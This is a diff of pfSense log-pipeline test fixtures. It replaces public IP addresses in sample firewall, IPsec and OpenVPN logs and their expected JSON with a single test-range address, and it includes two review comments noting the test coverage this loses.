@@ -1425,14 +1439,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385392232Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709502700Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,48979,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49672,853,0,S,1436983722,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1512,7 +1526,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385394769Z", + "ingested": "2021-12-09T13:44:35.709509100Z", "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0x0,,64,29691,0,DF,17,udp,78,10.170.27.41,10.170.27.255,137,137,58", "provider": "filterlog", "timezone": "-04:00", @@ -1536,23 +1550,25 @@ }, "destination": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 143.2104, - "lat": -33.494 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "AU" + "country_iso_code": "CN" }, "as": { - "number": 13335, + "number": 4837, "organization": { - "name": "Cloudflare, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "1.1.1.1", + "address": "175.16.199.1", "port": 853, - "ip": "1.1.1.1" + "ip": "175.16.199.1" }, "rule": { "id": "1535324496" 
@@ -1562,12 +1578,12 @@ "address": "10.170.12.50", "ip": "10.170.12.50" }, - "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "message": "146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NUrMaRq0JfKde00qO8PW2llVUx8=", + "community_id": "1:bR7oo0ti5ImuczW3EAgomPxyvPc=", "transport": "tcp", "type": "ipv4", "bytes": 60, @@ -1611,14 +1627,14 @@ }, "related": { "ip": [ - "1.1.1.1", + "175.16.199.1", "10.170.12.50" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385397270Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", + "ingested": "2021-12-09T13:44:35.709515400Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,25978,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49728,853,0,S,796254558,,64240,,mss;sackOK;TS;nop;wscale", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1640,8 +1656,25 @@ } }, "destination": { - "address": "239.255.255.250", - "ip": "239.255.255.250" + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", + "location": { + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" + }, + "as": { + "number": 4837, + "organization": { + "name": "CHINA UNICOM China169 Backbone" + } + }, + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "id": "1557957510" 
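Review bot: In the `@@ -1640,8 +1656,25 @@` hunk the IGMP event's destination moves from the multicast address 239.255.255.250 to 175.16.199.1, so the only IPv4 fixture whose destination was expected to carry no `geo`/`as` block is now enriched like every other event. That drops the regression check that the pipeline leaves non-routable IPv4 destinations un-enriched (the `ff02::1:2` event in the `@@ -693,7 +696,7 @@` hunk still covers that path, but for IPv6 only), and an IGMP membership message addressed to a unicast host is not a shape the source would produce. The matching input-line change is in the `.log` file outside this hunk; keeping 239.255.255.250 on that one line would retain the coverage, since multicast space is not a public address that the supported-subset change needs to replace.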
@@ -1650,12 +1683,12 @@ "address": "10.170.12.17", "ip": "10.170.12.17" }, - "message": "199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8", + "message": "199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:HgWBHt8msizUwObP4paAJzvwJFA=", + "community_id": "1:LdbmIdVyI4RYGCjX644CYvLBhdE=", "bytes": 32, "transport": "igmp", "type": "ipv4", @@ -1688,14 +1721,14 @@ }, "related": { "ip": [ - "239.255.255.250", + "175.16.199.1", "10.170.12.17" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385399853Z", - "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,239.255.255.250,datalength=8", + "ingested": "2021-12-09T13:44:35.709521900Z", + "original": "\u003c134\u003eJul 3 19:10:33 filterlog[72237]: 199,,,1557957510,igb1.12,match,pass,in,4,0xc0,,1,0,0,DF,2,igmp,32,10.170.12.17,175.16.199.1,datalength=8", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1718,22 +1751,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, - "address": "142.250.114.105", - "ip": "142.250.114.105" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "rule": { "id": "1520797901" 
@@ -1742,12 +1777,12 @@ "address": "10.100.10.30", "ip": "10.100.10.30" }, - "message": "176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164", + "message": "176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:/QaomA7rGHnGeJ56nHi7eln6R8U=", + "community_id": "1:gfzPY8KpURzu1udgYHkiWhvNozU=", "transport": "icmp", "type": "ipv4", "bytes": 84, @@ -1784,14 +1819,14 @@ }, "related": { "ip": [ - "142.250.114.105", + "175.16.199.1", "10.100.10.30" ] }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385402543Z", - "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,142.250.114.105,request,37728,164", + "ingested": "2021-12-09T13:44:35.709528Z", + "original": "\u003c134\u003eJul 4 11:10:45 filterlog[72237]: 176,,,1520797901,igb1.10,match,pass,in,4,0x0,,64,62096,0,DF,1,icmp,84,10.100.10.30,175.16.199.1,request,37728,164", "provider": "filterlog", "timezone": "-04:00", "kind": "event", @@ -1871,7 +1906,7 @@ }, "event": { "reason": "match", - "ingested": "2021-09-14T22:09:18.385405129Z", + "ingested": "2021-12-09T13:44:35.709534300Z", "original": "\u003c134\u003eJul 4 11:10:54 filterlog[72237]: 199,,,1557957510,igb1.15,match,pass,in,4,0x0,,64,0,0,DF,1,icmp,84,10.100.15.13,10.100.15.1,request,0,064", "provider": "filterlog", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json index eccacd06726..d1a5388bef7 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-dhcp.log-expected.json 
@@ -43,7 +43,7 @@ "mac": "4c:55:41:a0:fa:99" }, "event": { - "ingested": "2021-09-14T22:09:19.440156756Z", + "ingested": "2021-12-09T13:44:38.896609700Z", "original": "\u003c190\u003eJul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -117,7 +117,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440170047Z", + "ingested": "2021-12-09T13:44:38.896618700Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -197,7 +197,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440173663Z", + "ingested": "2021-12-09T13:44:38.896624700Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPREQUEST for 10.150.60.56 (10.150.60.1) from 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", @@ -271,7 +271,7 @@ "ip": "10.150.60.56" }, "event": { - "ingested": "2021-09-14T22:09:19.440176982Z", + "ingested": "2021-12-09T13:44:38.896629Z", "original": "\u003c190\u003eJul 4 09:39:41 dhcpd[64305]: DHCPACK on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60", "provider": "dhcpd", "timezone": "-04:00", diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json index 278d6e94444..dae9e7bb277 100644 --- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json +++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-haproxy.log-expected.json 
@@ -71,7 +71,7 @@
 },
 "event": {
 "duration": 2000000,
- "ingested": "2021-09-14T22:09:19.585921034Z",
+ "ingested": "2021-12-09T13:44:39.410311Z",
 "original": "\u003c134\u003eAug 15 16:15:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.502] TestFrontend~ TestBackend/TestServer 0/0/0/2/2 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /favicon.ico HTTP/1.1\" ",
 "provider": "haproxy",
 "timezone": "-04:00",
@@ -153,7 +153,7 @@
 },
 "event": {
 "duration": 3000000,
- "ingested": "2021-09-14T22:09:19.585934294Z",
+ "ingested": "2021-12-09T13:44:39.410319600Z",
 "original": "\u003c134\u003eAug 15 16:17:18 haproxy[41476]: 10.87.93.55:59607 [15/Aug/2021:16:15:18.407] TestFrontend~ TestBackend/TestServer 0/0/0/3/3 400 182 - - ---- 2/2/0/1/0 0/0 \"GET /login HTTP/1.1\" ",
 "provider": "haproxy",
 "timezone": "-04:00",
@@ -227,7 +227,7 @@
 },
 "event": {
 "duration": 30014000000,
- "ingested": "2021-09-14T22:09:19.585937789Z",
+ "ingested": "2021-12-09T13:44:39.410325100Z",
 "original": "\u003c134\u003eAug 15 16:18:40 haproxy[41476]: 10.87.93.55:58722 [15/Aug/2021:16:15:10.549] TestFrontend~ TestBackend/\u003cNOSRV\u003e -1/-1/-1/-1/30014 408 212 - - cR-- 2/2/0/0/0 0/0 \"\u003cBADREQ\u003e\" ",
 "provider": "haproxy",
 "timezone": "-04:00",
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log
index c3788265745..d27ff6304e2 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log
@@ -22,4 +22,4 @@
 <30>1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0
 <30>1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0
 <30>1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0
-<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)
+<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json
index 6ffdd84e339..131d6edf6d4 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-ipsec.log-expected.json
@@ -14,7 +14,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816231644Z",
+ "ingested": "2021-12-09T13:44:39.878248400Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547105-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_id = (null)",
 "provider": "charon",
 "timezone": "-05:00",
@@ -46,7 +46,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816244807Z",
+ "ingested": "2021-12-09T13:44:39.878257Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547109-05:00 pfSense.example.com charon 18610 - - 08[CFG] ppk_required = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -78,7 +78,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816248434Z",
+ "ingested": "2021-12-09T13:44:39.878262700Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547113-05:00 pfSense.example.com charon 18610 - - 08[CFG] mobike = 1",
 "provider": "charon",
 "timezone": "-05:00",
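Review bot: The rewritten ipsec sample now reads `sending packet: from 175.16.199.1[500] to 175.16.199.1[500]`, so source and destination are the same host, and the expected output in the `@@ -776,42 +776,49 @@` and `@@ -828,13 +835,12 @@` hunks below shows the consequence: identical source and destination geo/AS blocks and `related.ip` collapsed to a single entry. The fixture therefore no longer exercises independent enrichment of the two endpoints or the two-address `related.ip` case that the previous line covered. Using a second address from the same test range for one of the endpoints, and regenerating the expected entry, would keep that coverage.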
@@ -110,7 +110,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816251785Z",
+ "ingested": "2021-12-09T13:44:39.878268200Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547117-05:00 pfSense.example.com charon 18610 - - 08[CFG] aggressive = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -142,7 +142,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816255053Z",
+ "ingested": "2021-12-09T13:44:39.878273600Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547122-05:00 pfSense.example.com charon 18610 - - 08[CFG] dscp = 0x00",
 "provider": "charon",
 "timezone": "-05:00",
@@ -174,7 +174,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816258293Z",
+ "ingested": "2021-12-09T13:44:39.878279Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547126-05:00 pfSense.example.com charon 18610 - - 08[CFG] encap = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -206,7 +206,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816267446Z",
+ "ingested": "2021-12-09T13:44:39.878284400Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547130-05:00 pfSense.example.com charon 18610 - - 08[CFG] dpd_delay = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -238,7 +238,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816270950Z",
+ "ingested": "2021-12-09T13:44:39.878289900Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547207-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_in = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -270,7 +270,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816274398Z",
+ "ingested": "2021-12-09T13:44:39.878295400Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547211-05:00 pfSense.example.com charon 18610 - - 08[CFG] if_id_out = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -302,7 +302,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816277612Z",
+ "ingested": "2021-12-09T13:44:39.878300700Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547215-05:00 pfSense.example.com charon 18610 - - 08[CFG] local:",
 "provider": "charon",
 "timezone": "-05:00",
@@ -334,7 +334,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816280856Z",
+ "ingested": "2021-12-09T13:44:39.878306Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547220-05:00 pfSense.example.com charon 18610 - - 08[CFG] remote:",
 "provider": "charon",
 "timezone": "-05:00",
@@ -366,7 +366,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816284498Z",
+ "ingested": "2021-12-09T13:44:39.878311800Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547245-05:00 pfSense.example.com charon 18610 - - 08[CFG] updated vici connection: bypass",
 "provider": "charon",
 "timezone": "-05:00",
@@ -398,7 +398,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816287828Z",
+ "ingested": "2021-12-09T13:44:39.878317300Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547376-05:00 pfSense.example.com charon 18610 - - 07[CFG] vici client 84 requests: load-conn",
 "provider": "charon",
 "timezone": "-05:00",
@@ -430,7 +430,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816292286Z",
+ "ingested": "2021-12-09T13:44:39.878322700Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547385-05:00 pfSense.example.com charon 18610 - - 07[CFG] conn con1000:",
 "provider": "charon",
 "timezone": "-05:00",
@@ -462,7 +462,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816295894Z",
+ "ingested": "2021-12-09T13:44:39.878328Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547451-05:00 pfSense.example.com charon 18610 - - 07[CFG] child con1000:",
 "provider": "charon",
 "timezone": "-05:00",
@@ -494,7 +494,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816299150Z",
+ "ingested": "2021-12-09T13:44:39.878333500Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547457-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_time = 3240",
 "provider": "charon",
 "timezone": "-05:00",
@@ -526,7 +526,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816302510Z",
+ "ingested": "2021-12-09T13:44:39.878339Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547461-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_time = 3600",
 "provider": "charon",
 "timezone": "-05:00",
@@ -558,7 +558,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816305691Z",
+ "ingested": "2021-12-09T13:44:39.878344400Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547465-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_time = 360",
 "provider": "charon",
 "timezone": "-05:00",
@@ -590,7 +590,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816308985Z",
+ "ingested": "2021-12-09T13:44:39.878349800Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547469-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_bytes = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -622,7 +622,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816312220Z",
+ "ingested": "2021-12-09T13:44:39.878355200Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547473-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_bytes = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -654,7 +654,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816315512Z",
+ "ingested": "2021-12-09T13:44:39.878360600Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547477-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_bytes = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -686,7 +686,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816321752Z",
+ "ingested": "2021-12-09T13:44:39.878365900Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -718,7 +718,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816325097Z",
+ "ingested": "2021-12-09T13:44:39.878371300Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -750,7 +750,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816349366Z",
+ "ingested": "2021-12-09T13:44:39.878376900Z",
 "original": "\u003c30\u003e1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0",
 "provider": "charon",
 "timezone": "-05:00",
@@ -776,42 +776,49 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Europe",
- "region_iso_code": "FR-94",
- "city_name": "Maisons-Alfort",
- "country_iso_code": "FR",
- "country_name": "France",
- "region_name": "Val-de-Marne",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": 2.4415,
- "lat": 48.8096
- }
+ "lon": 125.3228,
+ "lat": 43.88
+ },
+ "country_iso_code": "CN"
 },
 "as": {
- "number": 3215,
+ "number": 4837,
 "organization": {
- "name": "Orange"
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
- "address": "90.92.7.206",
+ "address": "175.16.199.1",
 "port": 500,
- "ip": "90.92.7.206"
+ "ip": "175.16.199.1"
 },
 "source": {
 "geo": {
- "continent_name": "North America",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_name": "China",
+ "region_name": "Jilin",
 "location": {
- "lon": -97.822,
- "lat": 37.751
+ "lon": 125.3228,
+ "lat": 43.88
 },
- "country_iso_code": "US"
+ "country_iso_code": "CN"
+ },
+ "as": {
+ "number": 4837,
+ "organization": {
+ "name": "CHINA UNICOM China169 Backbone"
+ }
 },
- "address": "28.130.181.102",
+ "address": "175.16.199.1",
 "port": 500,
- "ip": "28.130.181.102"
+ "ip": "175.16.199.1"
 },
- "message": "14[NET] \u003ccon1000|11\u003e sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)",
+ "message": "14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)",
 "tags": [
 "preserve_original_event"
 ],
@@ -828,13 +835,12 @@
 },
 "related": {
 "ip": [
- "90.92.7.206",
- "28.130.181.102"
+ "175.16.199.1"
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:19.816355582Z",
- "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes)",
+ "ingested": "2021-12-09T13:44:39.878382400Z",
+ "original": "\u003c30\u003e1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] \u003ccon1000|11\u003e sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes)",
 "provider": "charon",
 "timezone": "-05:00",
 "kind": "event",
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log
index 7ab6528ea55..2a53865ef7d 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log
@@ -8,5 +8,5 @@
 <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849
 <37>Jul 3 21:42:57 openvpn[19830]: user 'bob' authenticated
 <29>Jul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 MULTI_sva: pool returned IPv4=10.170.170.2, IPv6=(Not enabled)
-<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]146.88.240.4:34745
+<27>1 2021-07-03T22:17:01.074560-05:00 pfSense.example.com openvpn 66026 - - TLS Error: cannot locate HMAC in incoming packet from [AF_INET]175.16.199.1:34745
 <36>1 2021-07-03T22:40:38.477134-05:00 pfSense.example.com openvpn 68813 - - user 'bob' could not authenticate.
\ No newline at end of file
diff --git a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json
index 2ba0831fe67..8e165c1184f 100644
--- a/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json
+++ b/packages/pfsense/data_stream/log/_dev/test/pipeline/test-pfsense-openvpn.log-expected.json
@@ -33,7 +33,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467660790Z",
+ "ingested": "2021-12-09T13:44:41.123205100Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_VER=3.git:released:662eae9a:Release",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -80,7 +80,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467669216Z",
+ "ingested": "2021-12-09T13:44:41.123224800Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PLAT=android",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -127,7 +127,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467672078Z",
+ "ingested": "2021-12-09T13:44:41.123247400Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_NCP=2",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -174,7 +174,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467674717Z",
+ "ingested": "2021-12-09T13:44:41.123253200Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_TCPNL=1",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -221,7 +221,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467677398Z",
+ "ingested": "2021-12-09T13:44:41.123258500Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_GUI_VER=net.openvpn.connect.android_3.2.4-5891",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -268,7 +268,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467680063Z",
+ "ingested": "2021-12-09T13:44:41.123264100Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_PROTO=2",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -315,7 +315,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467682683Z",
+ "ingested": "2021-12-09T13:44:41.123269400Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -357,7 +357,7 @@
 ]
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467685342Z",
+ "ingested": "2021-12-09T13:44:41.123274700Z",
 "original": "\u003c29\u003eJul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -386,7 +386,7 @@
 }
 },
 "event": {
- "ingested": "2021-09-14T22:09:25.467687961Z",
+ "ingested": "2021-12-09T13:44:41.123280Z",
 "original": "\u003c37\u003eJul 3 21:42:57 openvpn[19830]: user 'bob' authenticated",
 "provider": "openvpn",
 "timezone": "-04:00",
@@ -440,7 +440,7 @@
 ]
 },
 "event": {
